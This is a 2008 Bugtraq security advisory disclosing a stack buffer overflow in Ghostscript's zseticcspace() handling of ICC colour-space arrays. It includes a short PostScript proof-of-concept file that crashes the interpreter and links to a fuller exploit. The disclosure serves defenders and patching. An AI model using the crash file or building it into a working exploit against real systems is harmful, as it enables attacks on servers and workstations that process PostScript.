Ghostscript buffer overflow
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Ghostscript buffer overflow
- From: "Chris Evans" <scarybeasts@xxxxxxxxx>
- Date: Thu, 28 Feb 2008 14:57:42 -0800
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=MCnoVL1px4iU6uI8nbPAgbzBCmOo19N3pQa8IQ1F3No=; b=EjdP5frT31gY5p15dBQhJVukgQynHFNC0wWF9GnO0gr2ojuT/hEjwb2R1sj8R3cqE44xOnvNVv/V+2dFR7BE1eAJT5DHc8o4JYfNnjHnoQszCOXQM7yQI7WD7iZJAvtLaKsMS3HePmQ3mvbxSzboCMerMo+nz+G0Ob/I7ffzjNc=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=gDt2tYzPV/js/mcrXK5Vn/DyBaw4zENobyyjX7yjAqhMqWiornilpT1s0d9tqbshBDPwHj9yYti9GOAwi7MhJu6ZxIesWTJyC6jJ98RGyMdwI4ieNnLHNGmAjga67O/VWiSQHlKWSQU17Bp5kUioWeaxVX7rAccj7DSMsx/iv48=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Hi,
Buffer overflow in Ghostscript. A useful attack vector because a lot
of UNIX workstations will put PS files on the web through Ghostscript.
The problem is a stack-based buffer overflow in the zseticcspace()
function in zicc.c. The issue is over-trust of the length of a
postscript array which an attacker can set to an arbitrary length. One
slight amusement is that the overflowed type is "float", leading to
machine code -> float conversion in any exploit. An example .ps file
to trigger a crash follows:
%!PS-Adobe-2.0
<< /DataSource currentfile /N 100 /Range [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 ] >> .seticcspace
Announcement:
http://scarybeastsecurity.blogspot.com/2008/02/buffer-overflow-in-ghostscript.html
Full technical details including a demo exploit by my colleague Will Drewry:
http://scary.beasts.org/security/CESA-2008-001.html
Cheers
Chris